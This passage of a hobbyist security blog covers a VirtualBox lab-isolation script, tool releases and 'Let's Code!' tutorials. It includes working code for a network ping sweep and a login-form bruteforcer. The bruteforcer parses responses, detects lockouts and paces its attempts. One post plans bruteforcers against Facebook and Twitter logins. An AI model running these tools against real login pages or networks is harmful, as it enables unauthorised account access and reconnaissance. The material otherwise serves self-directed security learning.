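# leftover bridged or NAT adapter baked into a downloaded appliance.
configure_lab_vm() {
  vbm modifyvm "$1" --nic1 intnet --intnet1 "$LAB_NET" --nic2 none --nic3 none --nic4 none
}

# Full clone of a powered-off VM as the pristine baseline.
master_clone() {
  vbm clonevm "$1" --name "$1-master" --register --mode all
}

# The check that matters: no lab VM may have a nat/bridged/hostonly adapter.
# Takes the text of "VBoxManage showvminfo <vm> --machinereadable" and
# returns non-zero if any adapter could reach the host or the home LAN directly.
check_isolated() {
  ! printf '%s\n' "$1" | grep -Eq '^nic[0-9]+="(nat|bridged|hostonly|natnetwork)"'
}

build_lab() {
  configure_gateway pfsense
  for vm in kali win10; do configure_lab_vm "$vm"; done
  for vm in pfsense kali; do master_clone "$vm"; done
}
build_lab
```

Run it with DRY_RUN=0 once the VMs exist and are powered off (modifyvm refuses to touch a running VM). After importing any new Vulnhub appliance, feed its showvminfo output to check_isolated before the first boot; imported OVAs frequently arrive with a bridged adapter.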

Then I set to the task of updating Kali and installing Windows 10. I want to be able to use my own tools on as much of my research as possible. In fact, I would like to write a tool for as many problems as I can. I know this is duplicating a lot of work, but my end goal is knowledge and to broaden my personal understanding. I would like to be able to fully pentest a box using only self-written tools by the end of this entire endeavor. I'm not saying before I get my OSCP; that's not realistic in my opinion. I'm saying just in general. So, to circle back around: I am installing Windows 10 because the tools that I have written are all C# applications that run on Windows 10 and not Linux. I have gotten into Python lately for some home security reasons, but that's an article for another time. For now it's C# and PowerShell where possible. You should check some of my tools out: for doing trace routes and monitoring hop latency I wrote the TraceMon tool. For scanning network IPs I give you Ping Scanner. Last but not least, I have Port Knocker. Guess what it does! With these tools I can start doing some very basic network enumeration and service mapping. I gotta start somewhere, right?

That's all I am going to do for tonight, but I think it's a decent start. I intend to put out regular updates as I move forward with more VMs and start researching. Wish me luck!


Tool Drop! Time Keep by Ben from 7 February 2019


I find it hard to keep track of the number of things I am doing all day long, especially when I am at work clacking away at my keyboard with a vigor that only adult ADHD can possibly muster.
I have to multitask a lot for work. I have to overlap meetings and tasks regularly. I have to switch gears and work on something new at a moment's notice. Some days I have to track issues and outages all day. This makes it hard to properly keep track of time for the individual tasks I am doing. It makes planning resources for projects almost impossible, as all my time is multi-use time.
So I bring to you my solution to this daily headache, Time Keep!


Updates

1.0.0.1 - Initial Release

To download Time Keep click here.


Tools Update! by Ben from 30 January 2019


Hey Team,
As I previously said, I moved back to Visual Studio. I have rebuilt all the apps using Visual Studio and as such have put out updates for all of them. Instead of being stand-alone applications, they are now one-click install applications that need to be installed. This isn't bad though, as it allows me to make fun start menu entries.


HiHoHiHo, it's back to Visual Studio we go. by Ben from 13 January 2019


So... I have been trying SharpDevelop for some time to make my programs and such with. Why? Because I was trying to reduce my reliance on Microsoft when it comes to development. Mainly I was concerned that if I ever become serious as a developer, Visual Studio is kind of expensive. I know that I can use the Community version for free, but $1200 should I go Pro is pretty steep IMHO. SharpDevelop, for what it is, is super great. It handles my crappy level of newbie programming just fine. It has almost all the features that I want. So what is the problem with SharpDevelop? Nothing, except that it hasn't been updated since 2016. I think it may be dead. I can't be releasing up-to-date software with an IDE that itself isn't up to date.

So, because of this, I am going back to Visual Studio. I mean, there really are no other options out there. Plus, I would also like to dabble in game dev some. I would like to put out an Android game or two. For this I have downloaded Unity and will be trying my hand at some Android game dev.

Also, I am going to take this as an opportunity to rewrite all my applications and possibly rework their UI layout. I also want to fix a number of issues that I have found over time. Plus, I think this would also be a good time to learn how to spin up threads properly.


I had no idea. by Ben from 7 January 2019


I really had no idea that this was even a thing. Good read, and a quick primer on a subject that I think can probably go very deep.

Open redirects - the vulnerability class no one but attackers cares about from r/netsec


Yo Team! It's been a while. by Ben from 6 January 2019


Hey guys, it's been a while since I have made any posts or updates to this site. Well, that's changing today. Instead of using social media for posting and sharing content with people, I am going to move all my sharing and posting to this site or my other blogs, depending on the interest. Check back regularly for more posts.


Why are you like this? by Ben from 30 Nov 2018

Internet... I have one question for you. Why are you still like this?

What could we as a society have to gain from this? Why are we still doing shit like this to ourselves? It makes me wonder. Why have you not moved on? Are you literally still running a Pentium? Is this just throwaway virtual machines, or are these legitimate boxes still running Windows XP? Is this just some wayward internet soul being puppeted around by some bot? Why are you still like this, internet?

Tool Drop! TraceMON. by Ben from 14 Feb 2018

Hey Team! It's time for more free stuff! I have built a new tool called TraceMON. TraceMON is a route monitoring tool. Why would I need this, you might ask? Because it can help you get to the bottom of many internet-related issues, and I think it looks cool while it's running. Many times one website will take a long time to load but others will load almost instantly. Why is this? Because the internet is global, and the route your computer takes to reach one website might be totally different from the route it takes to reach another. This is where TraceMON comes in. Not only does TraceMON discover your route to a website, but it then monitors every single hop along the way continually, so you can know exactly where the slowdown is. Wanna learn more?


To download the tool and get the full details click here.

It has been way too long! by Ben from 11 Feb 2018

It has been way, way too long since I have made a post on this blog. Life sort of gets in the way sometimes, and projects can slip to the side and become forgotten if we don't prioritize them. Well, I want to start prioritizing producing content for this blog again.

First things first, I switched from Visual Studio Community to SharpDevelop. I didn't know if Microsoft would come after me or not for using their IDE to develop tools and code that I was giving away to people and businesses. Frankly, I am too lazy to look up, read, and understand their licensing around the Community edition. So I switched to an open source alternative. SharpDevelop so far has been very easy to get the hang of and in many ways is exactly the same as Visual Studio Community. I think the thing I like about it the most is how lightweight it is. However, one drawback I have found is that you have to build an installation package yourself, or you can have your apps function as standalone EXEs, which is what I have opted to do for now. I think this will actually allow for more portability of the apps, so I'm not sure I really consider it a loss. Secondly, I have fully redone the Ping Scanner and the Port Knocker using SharpDevelop. I have also added a couple of new features to each application. Check the update notes for each, as well as the updated source code!

Come on guys, this is getting old. by Ben from 31 Jan 2017

Just letting everyone know that I don't use phpMyAdmin.... Y'all can stop scanning for it.

I know this is just bots, but this is basically half of my damn webserver logs.

Tool Drop! Port Knocker. by Ben from 6 Jan 2017

It's been a while since I have been able to post anything, but I wanted to bring the new year in with a bit of style. So I give to you... free of charge... the Port Knocker.


To download the tool and get the full article click here.

Updating Tools and Programs! by Ben from 2 Jan 2017

So, anyone who develops programs that are distributed to other people runs into the problem of updates. How do you update a program on a computer controlled by someone else? Or how do you let them know they need to update it? Well, I have updated the Ping Scanner to do just that! I will release an article in the future detailing how the code works. If you really can't take the suspense, you can check out the source code of the Ping Scanner yourself.

How I hopefully secured a webcam to spy on my turtles. by Ben from 26 Oct 2016

I have five Red Eared Slider turtles, or "RES", that I keep as pets. I like them a lot, and I have spent a good amount of time and money caring for them. They actually require quite a few things to be cared for properly. After having spent all this energy and effort caring for them, it kind of sucks to not be able to see them all the time. So I set up a webcam. However, I am security minded, so I wanted to set up the cam in a secure way. I don't want to contribute to the current global crisis of webcam botnets destroying the internet. I would also like to obscure my home IP, so that the hordes of the internet are one step removed from me.

Let's first walk through the gear I used. Then we can dive into how all the various things are configured. And lastly we can discuss some of the steps I have taken to secure this entire setup. The gear list is as follows.


To get the full story click here.

Tool Drop! Ping Scanner. by Ben from 9 Oct 2016

Keeping with the DIY nature of this entire endeavor, I have made a tool called "Ping Scanner". Why call it exactly what it does? Because I have no imagination. What does it do? It simply sends pings out to a range of IP addresses you set and outputs their responses to a file. When attacking a company's public-facing servers, or after you're on a company's network, you need a way to determine what other machines are also online. That's what this tool does. Keep in mind that a host that doesn't answer ICMP isn't necessarily down: plenty of Windows boxes and firewalled servers drop echo requests, so a quiet address still deserves a port scan.

To download the tool and get the full article click here.
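For reference, here is an added POSIX sh version of the same job (this is not the Ping Scanner's code, which is C#): expand a CIDR block into host addresses, ping each one in parallel with a short timeout, and write the responders to a file. The range and output path in the usage line are assumptions.

```shell
#!/bin/sh
# Added example, not the Ping Scanner's own code: a CIDR ping sweep in POSIX sh.
# Expands the block to host addresses, pings each once, records the live ones.

# Dotted quad -> integer and back, using only POSIX arithmetic.
# (Octets with a leading zero would be read as octal; write plain decimals.)
ip2int() {
  set -- $(printf '%s' "$1" | tr '.' ' ')
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}
int2ip() {
  echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# Print every usable host address in a CIDR block. Network and broadcast are
# excluded for prefixes shorter than /31; /31 and /32 list every address.
cidr_hosts() {
  base=$(ip2int "${1%/*}"); bits="${1#*/}"
  size=$(( 1 << (32 - bits) ))
  net=$(( base & ~(size - 1) ))
  if [ "$bits" -ge 31 ]; then lo=$net; hi=$(( net + size - 1 ))
  else lo=$(( net + 1 )); hi=$(( net + size - 2 )); fi
  i=$lo
  while [ "$i" -le "$hi" ]; do int2ip "$i"; i=$(( i + 1 )); done
}

# One echo request with a ~1 s wait. -W is Linux iputils syntax; BSD/macOS
# ping uses -t for the same thing.
alive() { ping -c 1 -W 1 "$1" >/dev/null 2>&1; }

# Sweep in parallel (xargs -P, GNU and BSD both have it), sort the responders
# numerically, write them to the output file, and return how many answered.
ping_sweep() {
  cidr_hosts "$1" \
    | xargs -P 32 -I{} sh -c 'ping -c 1 -W 1 {} >/dev/null 2>&1 && echo {}' \
    | sort -t. -k1,1n -k2,2n -k3,3n -k4,4n > "$2"
  wc -l < "$2" | tr -d ' '
}

# Usage (range and file are assumptions): ping_sweep 192.168.56.0/24 alive.txt
```

Thirty-two parallel pings finish a /24 in a few seconds; drop -P if you are sweeping through a VPN or a flaky link where a burst of ICMP gets rate-limited and produces false negatives.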

Mystery flashdrives... An investigation. by Ben from 09 Sept 2016

This morning I was handed a stack of random thumb drives and told, "Five hundred of these showed up in the boss's office and we need to know if they are safe to use." This is a new occurrence for me, but I welcome the challenge. We've all heard about malicious USB sticks spreading viruses, so to me the threat is credible.

The first thing I did was open one of these things up and take pictures of the USB chip. It has "TW218B1552AACB020" on the back of the chip itself. A bit of googling did not turn up any information about the chip based on this, its only real identifiable marker.
To get the full story click here.

Let's Code! An HTTP/HTTPs Bruteforcer. by Ben from 28 Aug 2016

Welcome back for another round of Let's Code! Last week we built an SSH bruteforcer, so, sticking with the bruteforcing theme, we are going to make an HTTP/HTTPS bruteforcer. And since I am lazy, we are going to be reusing almost all of the code from last week. We are just going to modify it to work with HTTP/HTTPS login prompts. Here is the code that we will be reusing.


function HTTP-Bruteforcer {
	Param
		(
		 [string[]] $Servers,        # one or more login URLs to try
		 [string] $PathtoUsernames,
		 [string] $PathtoPasswords,
		 [string] $PathtoOutput
		)
	
	# One candidate per line in each wordlist
	$usernames = Get-Content $PathtoUsernames
	$passwords = Get-Content $PathtoPasswords	
		
	Foreach ($urlofserver in $Servers)
		{		
		Foreach($username in $usernames)
			{
			Foreach ($password in $passwords)
				{
				#This is where the login code goes
				#(site-specific: request method, field names, and how a failed login is told apart)
				}
			}	
		}
}


As you can see, we are going to be making the HTTP bruteforcer into a function. Unlike the SSH bruteforcer, which we could use wholesale without modification because all SSH servers basically function the same way, unfortunately every website uses a different method or different fields to log in. It could be a POST or a GET request, and an email or id form field could function as the username. Because of this variability in HTTP logins, I think we should actually make multiple HTTP bruteforcing functions. For the sake of this article we will first make a bruteforcer for Facebook, then we will make a bruteforcer for Twitter. The code below will log in to Facebook, but I will be using it to also test the login system of every site we want to bruteforce. I have saved it as Http-Bruteforcer-Tester.ps1
To get the full story click here.
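Since the loop structure is the same for every site and only the request details change, here is an added curl-based version in sh (not the post's PowerShell) that turns those details into parameters: the login URL, the form field names, and a string the site returns on a failed login. Those values are assumptions you must read off the target's login form first (view the HTML, then confirm with one curl -v), and the script should only be pointed at a login you are authorised to test.

```shell
#!/bin/sh
# Added example, not the post's code: a generic HTTP POST form bruteforcer
# built on curl. Field names, URL and the failure marker are assumptions that
# must be taken from the target's form; FAIL_MARKER below is a placeholder.
FAIL_MARKER="${FAIL_MARKER:-Invalid username or password}"

# Decide what one attempt meant from the status code, the Location header and
# the body. A failure marker in the body is definite; a redirect anywhere but
# back to the login page is the usual success signal; 429/403 means the site
# is rate-limiting or has locked the account, so keep going and you lose.
classify() {  # $1 = HTTP status, $2 = Location header (may be empty), $3 = body
  if printf '%s' "$3" | grep -qF -- "$FAIL_MARKER"; then echo fail; return; fi
  case "$1" in
    302|303) case "$2" in *login*) echo fail ;; *) echo success ;; esac ;;
    200)     echo maybe ;;    # no marker and no redirect: look at it by hand
    429|403) echo blocked ;;
    *)       echo fail ;;
  esac
}

# One POST. --data-urlencode handles escaping of odd characters in passwords.
try_login() {  # $1 url, $2 user field, $3 user, $4 pass field, $5 pass
  hdr=$(mktemp); body=$(mktemp)
  status=$(curl -s -o "$body" -D "$hdr" -w '%{http_code}' \
           --data-urlencode "$2=$3" --data-urlencode "$4=$5" "$1")
  loc=$(sed -n 's/^[Ll]ocation:[[:space:]]*//p' "$hdr" | tr -d '\r')
  classify "$status" "$loc" "$(cat "$body")"
  rm -f "$hdr" "$body"
}

# Same three nested loops as the PowerShell version, one URL at a time.
# Stops on the first hit per user and bails out entirely once blocked.
http_bruteforce() {  # $1 url, $2 user field, $3 pass field, $4 userlist, $5 passlist, $6 outfile
  while read -r u; do
    while read -r p; do
      r=$(try_login "$1" "$2" "$u" "$3" "$p")
      printf '%s %s %s\n' "$r" "$u" "$p" >> "$6"
      case "$r" in
        success) echo "HIT $u:$p"; break ;;
        blocked) echo "blocked while trying $u; stopping"; return 1 ;;
      esac
      sleep 1   # pace it; lockout policies are the usual reason a bruteforce dies
    done < "$5"
  done < "$4"
}

# Usage (all values are assumptions for illustration):
# http_bruteforce https://target.example/login username password users.txt pass.txt out.txt
```

The classify function is where each site's quirks go: a site that answers 200 with the dashboard on success and 200 with an error on failure needs a success marker instead of a failure one, and a site that sets a session cookie without redirecting needs the -D header file inspected for Set-Cookie. Run one known-bad attempt through curl -v first so the markers are right before the loops start.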

Let's Code! An Ssh Bruteforcer. by Ben from 21 Aug 2016

Since this is the first Let's Code!, I am going to describe my setup and why I am doing things the way I am going to do them. I am going to do most of my early coding on this site in either PowerShell or C#. I use PowerGUI for coding PowerShell in. It has excellent syntax highlighting, and I find the variables window to be indispensable when trying to figure out what my code is doing. And for C# I use Visual Studio 2015 Community, as it is the industry standard, but mainly because I absolutely LOVE LOVE its indentation fixing.

I am going to be using the default PowerShell that comes with a fully updated Windows 10 install. I have not specifically updated PowerShell. But why would I not download the most up-to-date PowerShell to write my code in? I want my code to be as compatible as possible. New PowerShell versions regularly add cmdlets and language features that will not work on older versions. I know that Windows 7 uses PowerShell 2.0 by default and that my PowerShell version is 5.0 (Windows 10). At work, I limit my code to 2.0-compatible functions and syntax, as Windows 7 is heavily deployed. At home, I am fine with running 5.0, as I only have the one Windows machine and it's 10. But why am I fine with this for code intended to be used in unknown environments? Well, as we all know, Microsoft has sort of been dicks about shoving Windows 10 down everyone's throats! They brag about having 300 million plus installs already. So, I would say that's a decent target base, and so again, to maximize compatibility, I limit myself to the default version.

Ok, So with that out of the way I'll get to the meat of today's Let's Code!
To get the full story click here.

What's to come. by Ben from 20 Aug 2016

Ok.. Ok.. I have finally talked myself into starting this project. I am going to be starting 3 different series of articles: Let's Code!, Bypass.., and In The News. Let's Code! is going to be a series of articles in which I write, search for, and examine code. Bypass.. is going to be a series of articles in which I discuss various different ways to bypass different supposed security in as fun or novel a way as possible. And lastly In The News, which is going to be a series of articles in which I simply discuss the latest news related to security.

So why would I want to do this at all? Well, ever since I was a kid I have had a deep passion for tech and electronics. I don't know anything about security currently. I mean, not really. I've maybe done some poking and prodding before, and I have a lot of skills I believe may translate. But mostly I just want to learn. I am starting from the position of a complete novice. I don't have a rep, or any certs, or creds; I don't really know anything. This is simply going to be my attempt to learn and document it all.

This is just the beginning. by Ben from 11 Nov 2015

This is the first post of what I hope will be many to come. This site is primarily going to consist of my thoughts and analysis of current and trending security news and topics. However, I am also currently working on unique content that I hope the security community will find valuable. I will be open sourcing the tools and scripts that I am in the process of making as well. Please check back here regularly to keep updated on my latest research.